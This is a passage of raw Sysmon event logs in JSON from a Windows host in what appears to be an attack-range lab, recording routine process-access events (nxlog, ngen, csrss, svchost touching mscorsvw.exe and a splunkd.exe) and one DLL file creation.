C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:23.904","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:03:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:24","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9046,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:24.904\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:24.904","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:03:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:24","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":9047,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:03:24.919\r\nProcessGuid: {E2A3D6B1-13B9-5F25-0000-001046761100}\r\nProcessId: 4428\r\nImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Temp\\114c-0\\System.Data.dll\r\nCreationUtcTime: 2020-08-01 07:03:24.919","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:03:24.919","ProcessGuid":"{E2A3D6B1-13B9-5F25-0000-001046761100}","Image":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Temp\\114c-0\\System.Data.dll","CreationUtcTime":"2020-08-01 07:03:24.919","EventReceivedTime":"2020-08-01 07:03:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:25","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9048,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:25.044\r\nSourceProcessGUID: {E2A3D6B1-12B6-5F25-0000-0010A1A50900}\r\nSourceProcessId: 2312\r\nSourceThreadId: 876\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-13A1-5F25-0000-00101F9B1000}\r\nTargetProcessId: 2520\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+92bd7|C:\\Windows\\SYSTEM32\\ntdll.dll+c7734|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+abce(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+af4a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b1b4(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8f0a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8fe3(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+9082(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:25.044","SourceProcessGUID":"{E2A3D6B1-12B6-5F25-0000-0010A1A50900}","SourceProcessId":"2312","SourceThreadId":"876","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-13A1-5F25-0000-00101F9B1000}","TargetProcessId":"2520","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+92bd7|C:\\Windows\\SYSTEM32\\ntdll.dll+c7734|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+abce(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+af4a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b1b4(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8f0a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8fe3(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+9082(wow64)","EventReceivedTime":"2020-08-01 07:03:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:25","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9049,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:25.044\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-13A1-5F25-0000-00101F9B1000}\r\nTargetProcessId: 2520\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:25.044","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-13A1-5F25-0000-00101F9B1000}","TargetProcessId":"2520","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:03:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:25","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9050,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:25.060\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-13BD-5F25-0000-0010577C1100}\r\nTargetProcessId: 2520\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:25.060","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-13BD-5F25-0000-0010577C1100}","TargetProcessId":"2520","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:25","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9051,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:25.482\r\nSourceProcessGUID: {E2A3D6B1-12B6-5F25-0000-0010A1A50900}\r\nSourceProcessId: 2312\r\nSourceThreadId: 4104\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-13BD-5F25-0000-00101E801100}\r\nTargetProcessId: 1492\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ae03(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c43d(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c4ad(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:25.482","SourceProcessGUID":"{E2A3D6B1-12B6-5F25-0000-0010A1A50900}","SourceProcessId":"2312","SourceThreadId":"4104","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-13BD-5F25-0000-00101E801100}","TargetProcessId":"1492","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ae03(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c43d(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c4ad(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:03:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:25","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9052,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:25.482\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-13BD-5F25-0000-00101E801100}\r\nTargetProcessId: 1492\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:25.482","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-13BD-5F25-0000-00101E801100}","TargetProcessId":"1492","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:03:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:25","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9053,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:25.482\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-13BD-5F25-0000-00101E801100}\r\nTargetProcessId: 1492\r\nTargetImage: 